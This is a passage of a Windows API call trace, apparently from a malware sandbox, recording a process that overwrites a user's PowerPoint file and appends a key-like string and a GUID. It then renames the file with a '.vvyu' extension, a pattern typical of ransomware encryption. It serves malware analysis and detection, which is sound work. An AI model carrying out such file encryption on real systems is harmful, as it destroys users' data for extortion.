[0192.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0192.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0192.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41c38 | out: hHeap=0x6a0000) returned 1 [0192.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0192.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.661] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x15e98, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x15e98, lpOverlapped=0x0) returned 1 [0192.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.663] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15e9d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.663] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.668] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.668] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.668] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.668] CloseHandle (hObject=0x584) returned 1 [0192.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x6f4d00 [0192.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d45778 [0192.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6f4d00 | out: hHeap=0x6a0000) returned 1 [0192.673] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\Z8rQUb38uy_iJ3tNKmP2.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\z8rqub38uy_ij3tnkmp2.ppt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\Z8rQUb38uy_iJ3tNKmP2.ppt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\z8rqub38uy_ij3tnkmp2.ppt.vvyu")) returned 1 [0192.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.675] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0192.678] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59042aa0, ftCreationTime.dwHighDateTime=0x1d89923, ftLastAccessTime.dwLowDateTime=0xab78d9c0, ftLastAccessTime.dwHighDateTime=0x1d89e3c, ftLastWriteTime.dwLowDateTime=0xab78d9c0, ftLastWriteTime.dwHighDateTime=0x1d89e3c, nFileSizeHigh=0x0, nFileSizeLow=0x15e9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z8rQUb38uy_iJ3tNKmP2.ppt", cAlternateFileName="Z8RQUB~1.PPT")) returned 0 [0192.678] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0192.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0192.679] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0192.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0192.679] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0192.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0192.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0192.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.704] HeapFree (in: hHeap=0x6a0000, 